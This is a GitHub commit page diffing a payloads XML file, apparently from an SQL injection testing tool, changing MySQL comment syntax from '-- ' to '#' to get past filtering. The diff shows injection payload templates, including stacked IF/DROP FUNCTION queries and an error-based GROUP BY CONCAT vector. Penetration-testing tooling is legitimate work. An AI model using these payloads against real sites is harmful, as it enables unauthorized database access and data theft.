You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
using MySQL comments in explicit MySQL payloads where not comments stated in title (as we already use in MySQL UNION payloads; in lots of cases minus character is either filtered or "exploded" - seen in lots of WP vulnerabilites; also, it was a false claim by myself previously that # is no longer a valid MySQL comment syntax in never versions)
Copy file name to clipboardExpand all lines: xml/payloads.xml
+6-6Lines changed: 6 additions & 6 deletions
Original file line number
Diff line number
Diff line change
@@ -1039,7 +1039,7 @@ Formats:
1039
1039
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
1040
1040
<request>
1041
1041
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
1042
-
<comment>-- </comment>
1042
+
<comment>#</comment>
1043
1043
</request>
1044
1044
<response>
1045
1045
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
@@ -1402,7 +1402,7 @@ Formats:
1402
1402
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
1403
1403
<request>
1404
1404
<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
0 commit comments